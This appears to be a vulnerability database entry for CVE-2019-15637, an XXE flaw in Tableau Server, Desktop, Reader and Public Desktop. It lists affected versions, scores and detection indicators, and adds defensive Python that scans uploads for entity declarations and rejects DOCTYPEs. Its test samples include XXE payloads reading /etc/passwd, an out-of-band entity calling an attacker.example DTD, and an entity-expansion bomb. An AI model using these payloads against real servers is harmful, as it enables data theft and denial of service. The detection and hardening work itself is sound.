CVE-2019-15637
Published 2019-08-26
Priority: P2 · 76 · high · CVSS 3.1 base score 8.1
CVSS vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
Flags: ITW (in the wild) · EXPLOIT (public exploit) · VulnCheck KEV
Exploited in the wild
EPSS: 14.31% (96.2th percentile)
Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS. This affects Tableau Server, Tableau Desktop, Tableau Reader, and Tableau Public Desktop.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tableau | tableau_desktop | 10.2 – 10.2.23 | — |
| tableau | tableau_desktop | 10.3 – 10.3.23 | — |
| tableau | tableau_desktop | 10.4 – 10.4.19 | — |
| tableau | tableau_desktop | 10.5 – 10.5.18 | — |
| tableau | tableau_desktop | 2018.1 – 2018.1.15 | — |
| tableau | tableau_desktop | 2018.2 – 2018.2.12 | — |
| tableau | tableau_desktop | 2018.3 – 2018.3.9 | — |
| tableau | tableau_desktop | 2019.1 – 2019.1.6 | — |
| tableau | tableau_desktop | 2019.2 – 2019.2.2 | — |
| tableau | tableau_public_desktop | 10.2 – 10.2.2 | — |
| tableau | tableau_reader | 10.2 – 10.2.2 | — |
| tableau | tableau_server | 10.2 – 10.2.23 | — |
| tableau | tableau_server | 10.3 – 10.3.23 | — |
| tableau | tableau_server | 10.4 – 10.4.19 | — |
| tableau | tableau_server | 10.5 – 10.5.18 | — |
| tableau | tableau_server | 2018.1 – 2018.1.15 | — |
| tableau | tableau_server | 2018.2 – 2018.12 | — |
| tableau | tableau_server | 2018.3 – 2018.3.9 | — |
| tableau | tableau_server | 2019.1 – 2019.1.6 | — |
| tableau | tableau_server | 2019.2 – 2019.2.2 | — |
Detection & IOCs (extracted from sources)
- Monitor multipart/form-data POST requests to Tableau Server endpoints that include an `extensionManifestContents` field; that field is the injection point for the XXE payload in the public PoC.
- Alert on Tableau Server requests that carry the `workgroup_session_id` cookie together with a multipart submission whose `extensionManifestContents` field contains XML; that combination is the exploitation pattern for this XXE.
- Malicious workbooks, data sources and extension files published to or used on Tableau Server can trigger this XXE; inspect uploaded .twb, .tds and extension manifest files for DOCTYPE and external entity declarations.
- Exploitation requires an authenticated session (a valid `workgroup_session_id` cookie) and knowledge of target-specific parameters (the `zoneId` and the dashboard name), which rules out unauthenticated exploitation but not exploitation by an authenticated low-privilege user.
- The exploit author notes that the PoC is incomplete because they had no access to the source code; a more complete exploit may exist at the referenced GitHub repository.
- The vulnerability affects Tableau Server, Tableau Desktop, Tableau Reader and Tableau Public Desktop; detection and patching scope must cover all four.
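The two detection bullets above (the multipart `extensionManifestContents` pattern, and inspecting uploaded .twb/.tds/manifest XML for entity declarations) together with the usual XXE hardening are demonstrated in the following Python, which is an added example and not code from the Tableau advisory, from VulnCheck, or from the public PoC. The function names (`find_xxe_indicators`, `extract_multipart_field`, `scan_request`, `parse_without_doctype`), the sample XML, the request path `/placeholder-endpoint` and the host `tableau.example` are all constructed for illustration; the real upload endpoint is not named on this page.

```python
"""Detection and hardening for the XXE pattern described above: scan XML that a
Tableau product would parse (a .twb workbook, a .tds data source, or the
extensionManifestContents field of a multipart POST) for entity declarations,
and parse it with a DOCTYPE-refusing parser.  Added example; the requests and
XML below are constructed, not taken from the advisory or the public PoC."""
import re
import xml.parsers.expat
from typing import Dict, List

# <!ENTITY name SYSTEM "..."> or <!ENTITY % name SYSTEM "...">: an external
# entity, the classic XXE file-read / SSRF primitive.
EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(%\s+)?[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.I)
# Parameter entities are the usual vehicle for out-of-band exfiltration.
PARAMETER_ENTITY = re.compile(r"<!ENTITY\s+%\s+[\w.-]+", re.I)
# Internal entity definitions; one whose value references other entities is the
# building block of an expansion ("billion laughs") DoS.
INTERNAL_ENTITY = re.compile(r'<!ENTITY\s+([\w.-]+)\s+"([^"]*)"', re.I)
ENTITY_REF = re.compile(r"&[\w.-]+;")


def find_xxe_indicators(xml_text: str) -> List[str]:
    """Return the XXE indicators present in xml_text; an empty list means clean.
    Any DOCTYPE is reported (assumption: neither a workbook nor a manifest
    needs one, so its presence in user-supplied XML is itself suspicious)."""
    findings = []
    if re.search(r"<!DOCTYPE\b", xml_text, re.I):
        findings.append("doctype")
    if EXTERNAL_ENTITY.search(xml_text):
        findings.append("external_entity")
    if PARAMETER_ENTITY.search(xml_text):
        findings.append("parameter_entity")
    if any(len(ENTITY_REF.findall(v)) > 1 for _, v in INTERNAL_ENTITY.findall(xml_text)):
        findings.append("entity_expansion")
    return findings


def extract_multipart_field(raw_request: bytes, field: str) -> str:
    """Pull one form field's body out of a raw multipart/form-data HTTP request."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    m = re.search(rb"boundary=([^\s;]+)", head, re.I)
    if not m:
        return ""
    delimiter = b"--" + m.group(1).strip(b'"')
    for part in body.split(delimiter):
        part_head, _, part_body = part.partition(b"\r\n\r\n")
        if re.search(rb'name="' + re.escape(field.encode()) + rb'"', part_head):
            return part_body.rstrip(b"\r\n").decode("utf-8", "replace")
    return ""


def scan_request(raw_request: bytes) -> Dict[str, object]:
    """The rule from the IOC list: a multipart POST carrying a
    workgroup_session_id cookie whose extensionManifestContents field holds
    XML with entity declarations."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    manifest = extract_multipart_field(raw_request, "extensionManifestContents")
    findings = find_xxe_indicators(manifest) if manifest else []
    return {
        "has_session_cookie": b"workgroup_session_id=" in head,
        "has_manifest_field": bool(manifest),
        "findings": findings,
        "alert": bool(findings),
    }


def parse_without_doctype(xml_text: str) -> str:
    """Hardened parse: expat with a DOCTYPE handler that aborts.  With no
    DOCTYPE no entity can be declared, so neither external-entity reads nor
    expansion attacks are reachable.  Returns the root element name."""
    parser = xml.parsers.expat.ParserCreate()
    root: List[str] = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE %r rejected: untrusted XML may not declare entities" % name)

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(xml_text.encode("utf-8"), True)
    return root[0]


# Constructed samples (hypothetical; not Tableau's real file contents).
BENIGN_TWB = ('<?xml version="1.0" encoding="utf-8"?>\n'
              '<workbook version="2019.2"><datasources/></workbook>')
XXE_MANIFEST = ('<?xml version="1.0"?>\n'
                '<!DOCTYPE manifest [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
                '<manifest><name>&xxe;</name></manifest>')
OOB_MANIFEST = ('<!DOCTYPE m [<!ENTITY % dtd SYSTEM "http://attacker.example/x.dtd"> %dtd;]>'
                '<manifest/>')
LAUGHS = ('<!DOCTYPE m [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">'
          '<!ENTITY c "&b;&b;&b;&b;">]><m>&c;</m>')


def build_request(manifest_xml: str) -> bytes:
    """Constructed upload request; the path is a placeholder, not the real endpoint."""
    boundary = "----ExampleBoundary"
    body = ('--%s\r\nContent-Disposition: form-data; name="extensionManifestContents"\r\n'
            '\r\n%s\r\n--%s--\r\n') % (boundary, manifest_xml, boundary)
    return ("POST /placeholder-endpoint HTTP/1.1\r\nHost: tableau.example\r\n"
            "Cookie: workgroup_session_id=0123456789abcdef\r\n"
            "Content-Type: multipart/form-data; boundary=%s\r\n\r\n%s" % (boundary, body)
            ).encode("utf-8")


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_TWB), ("xxe", XXE_MANIFEST),
                       ("oob", OOB_MANIFEST), ("laughs", LAUGHS)]:
        print(label, find_xxe_indicators(doc))
    print(scan_request(build_request(XXE_MANIFEST)))
    print(parse_without_doctype(BENIGN_TWB))
    try:
        parse_without_doctype(XXE_MANIFEST)
    except ValueError as exc:
        print("rejected:", exc)
```

The regex scanner is deliberately run on the raw text rather than on a parsed document, because the point of the control is to refuse the DOCTYPE before any parser touches it; the same `find_xxe_indicators` can be run over .twb and .tds files at upload time and over the request body in a WAF or proxy rule. The hardened parser shows the corresponding server-side fix: rejecting the DOCTYPE entirely closes both the disclosure (external entity) and the DoS (entity expansion) cases named in the description, which is stricter than merely disabling external entity resolution.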
CVSS provenance
- NVD, CVSS v3.1: 8.1 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
- NVD, CVSS v3.0: 7.1 HIGH, CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L
- NVD, CVSS v2.0: 5.5 MEDIUM, AV:N/AC:L/Au:S/C:P/I:N/A:P
- VulnCheck: 8.1 HIGH
GHSA
GHSA-rmvg-87v4-qjvv (unreviewed, 2022-05-24) · CVE-2019-15637 · HIGH · CWE-611
Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS. This affects Tableau Server, Tableau Desktop, Tableau Reader, and Tableau Public Desktop.
VulnCheck
tableau tableau_server: Improper Restriction of XML External Entity Reference · 2019 · CVSS 8.1 HIGH · CVE-2019-15637
Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS. This affects Tableau Server, Tableau Desktop, Tableau Reader, and Tableau Public Desktop.
Affected: tableau tableau_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/2024-07/aa24-207a-dprk-cyber-group-conducts-global-espionage-campaign.pdf
No detection rules found.
No writeups or analysis indexed.
References
- https://community.tableau.com/community/security-bulletins/blog/2019/08/22/important-adv-2019-030-xxe-vulnerability-in-tableau-products
- https://github.com/minecrater/exploits/blob/master/TableauXXE.py
- https://packetstormsecurity.com/files/154232/Tableau-XML-Injection.html